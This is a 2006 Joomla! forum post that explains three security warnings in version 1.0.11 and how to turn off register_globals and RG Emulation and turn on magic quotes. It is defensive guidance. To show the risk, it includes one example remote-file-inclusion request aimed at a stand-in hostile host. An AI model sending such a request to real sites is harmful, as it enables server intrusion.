Security Messages in Joomla! 1.0.11

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
User avatar
Hackwar
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 3763
Joined: Fri Sep 16, 2005 8:41 pm
Location: NRW - Germany
Contact:

Security Messages in Joomla! 1.0.11

Post by Hackwar » Sat Sep 09, 2006 7:38 pm

In Joomla! 1.0.11, three security messages have been introduced to make Joomla! installations more secure. The following explanations should help you understanding and solving the issues behind this.

Please notice that this topic is locked. If you want to discuss it, go here.

Register Globals
What does it do?
The function register_globals helps lazy developers with coding their programs. It basically takes all values, that are passed over to the script and puts them into variables. This means that

Code: Select all

index.php?foo=bar
automatically creates a variable $foo with the value bar in the script index.php.

Why is this bad? The culprit with this functions is, that it does not check the value for anything harmfull. So if I want to overwrite the path Joomla! uses to include files, I could just pass this over to the script:

Code: Select all

index.php?mos_config_livesite=http://bad.hacker.tld
Now the index.php will try to include their files and loads a file from a hostile server. With this script, the hacker has gained entry to your server.

The function itself is not bad. If you check each variable before using its content, you are practically safe and this feature is helping you (as a developer). The problem is, that a lot of developers deliver sloppy work and don't check all their variables. In Joomla! its even simpler. For developers there is a function called mosGetParam(), that does (allmost) all the checking for you and its so easy to use. If all developers would use this function and not rely on register_globals, we would have very little security problems.

How can I turn register_globals off?
There are several ways how to turn off the function register_globals.

Apache/PHP configuration files outside of your website's folder
If you have access to the configuration files of your server, you can put

Code: Select all

register_globals = Off
in them. You should have some experience with this. When you do something wrong, your server could stop responding!

.htaccess file
On most servers, you can configure the Apache with files with the name .htaccess. These files can not be read from the web! Often you can't just copy such a file on your webspace, but you can rename a file to .htaccess. To create this file, just open a text-editor like Notepad or on Linux vi (NOT Word!!) and insert the line

Code: Select all

php_flag register_globals off
If you safe this now in the root folder of Joomla!, register_globals is now turned off for your whole site and all sub-folders.

php.ini
When the .htaccess file does not work, you can try to use a php.ini file. This is allmost the same, but the line has to be

Code: Select all

register_globals = off
and you have to copy this file into EACH folder of your Joomla! installation. This posting can help you with that.

If all of these measurements do not show any effect, you should contact your provider and tell them to turn it off for you.
If they refuse to do so, you should consider changing your hosting, since this is a basic (security) setting that has been around for years.

Magic Quotes
What does it do?
This function makes sure that all variables that are handed over to your database are getting escaped. This means that potential hacker attempts on your database through PHP scripts are prevented. This option should be turned ON!

How can I turn magic_quotes_gpc on?
Basically its the same as with register_globals, the only difference is, that you have to put the following line in your .htaccess:

Code: Select all

php_flag magic_quotes_gpc on
And in the php.ini:

Code: Select all

magic_quotes_gpc = on
RG Emulation
What does it do?
RG Emulation is an emulation of the function register_globals. It prevents a lot of security holes that come with the real register_globals and makes a lot of (sloppily coded) extensions work, although register_globals is turned off. But unfortunately it does not close all security holes and therefore, you should turn this feature off.

How can I turn rg_emulation off?
Open the file globals.php in your Joomla root folder and search for the following line:

Code: Select all

define( 'RG_EMULATION', 1 );
Now change the 1 to a 0 (zero) and save the file. Now the emulation is turned off and your safer. If you have now extensions that don't work, please look here.

Is my site now secure?
No. There are several more ways a hacker can gain entry to your server. These three settings just close up the three biggest holes in your server. Security in general is never complete and this means, that you can only make it as hard as possible for potential hackers to gain entry to your site. To ensure more security, allways use the latest version of Joomla! and of all extensions you are using on your site. Further you should register yourself to the anouncenment board of Joomla! by clicking the Notify button and read the security forum.
Last edited by Hackwar on Mon Sep 11, 2006 11:55 am, edited 1 time in total.
god doesn't play dice with the universe. not after that drunken night with the devil where he lost classical mechanics in a game of craps.

Since the creation of the Internet, the Earth's rotation has been fueled, primarily, by the collective spinning of English teachers in their graves.

Locked

Return to “Security - 1.0.x”